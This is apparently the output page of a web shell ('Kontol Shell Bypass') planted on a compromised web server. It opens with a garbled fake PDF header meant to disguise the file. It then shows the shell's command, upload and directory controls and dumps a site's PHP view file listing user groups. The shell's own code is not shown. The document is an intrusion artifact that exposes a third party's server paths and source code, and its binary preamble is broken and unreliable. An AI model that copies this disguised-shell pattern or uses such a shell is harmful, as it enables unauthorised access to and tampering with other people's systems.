%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/chalkbank.com/application/views/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/chalkbank.com/application/views/group_list.php
 <div class="main-wapper-inner">
 <div class="top-menus">
 <div class="container-fluid">
   <div class="row">
   <div class="col-lg-12">
   
   <h3><i class="fa fa-cog" aria-hidden="true"></i>  <?php echo $title;?></h3>
   
     
	 </div><!-- /input-group -->
	 
     </div>
  </div><!-- /.col-lg-6 -->
</div>
<div class="home-inners">
 <div class="container-fluid">
   
 

  <div class="row">
 
<div class="col-md-12">
 			<?php 
		if($this->session->flashdata('message')){
			echo $this->session->flashdata('message');	
		}
		?>	
<div id="message"></div>
<form method="post" action="<?php echo site_url('user/insert_group/');?>">
<table class="table table-bordered">
<tr>
<?php
        $logged_in=$this->session->userdata('logged_in');
        if($this->session->userdata['logged_in']['su']>=2){
        ?>

 <th>#</th>
<?php } ?>
 <th><?php echo $this->lang->line('group_name');?></th>
 <th><?php echo $this->lang->line('group_code');?></th>
 <th><?php echo $this->lang->line('valid_for_days');?></th>
<th><?php echo $this->lang->line('action');?> </th>
</tr>
<?php 
if(count($group_list)==0){
	?>
<tr>
 <td colspan="3"><?php echo $this->lang->line('no_record_found');?></td>
</tr>	
	
	
	<?php
}

foreach($group_list as $key => $val){
?>
<tr> 
<?php
        if($this->session->userdata['logged_in']['su']>=2){
        ?>
	<td>GID<?php echo $val['gid'];?></td>
<?php } ?>
	<td><input type="text"   class="form-control"  value="<?php echo $val['group_name'];?>" onBlur="updategroup(this.value,'<?php echo $val['gid'];?>');" ></td>
	<td><input type="text"   class="form-control"  value="<?php echo $val['group_code'];?>" onBlur="updategroupcode(this.value,'<?php echo $val['gid'];?>');" ></td>
	<td><input type="text"   class="form-control"  value="<?php echo $val['valid_for_days'];?>" onBlur="updategroupvalid(this.value,'<?php echo $val['gid'];?>');" ></td>
	<td><a href="javascript:remove_entry('user/remove_group/<?php echo $val['gid'];?>');"><img src="<?php echo base_url('images/cross.png');?>"></a></td>
</tr>

<?php 
}
?>
<tr>
<?php
        if($this->session->userdata['logged_in']['su']>=2){
        ?>
	<td>NA</td>
<?php } ?>
	<td> <input type="text"   class="form-control"   name="group_name" value="" placeholder="<?php echo $this->lang->line('group_name');?>"  required ></td>
	<td> <input type="text"   class="form-control"   name="group_code" value="" placeholder="<?php echo $this->lang->line('group_code');?>"  required ></td>
	<td> <input type="text"   class="form-control"   name="valid_for_days" value="" placeholder="<?php echo $this->lang->line('valid_for_days');?>"  required ></td>
	<td><button class="btn btn-default button5" type="submit"><?php echo $this->lang->line('add_new');?></button></td>
</tr>
</table>
</form>
</div>

</div>
</div>
</div>
</div>

Kontol Shell Bypass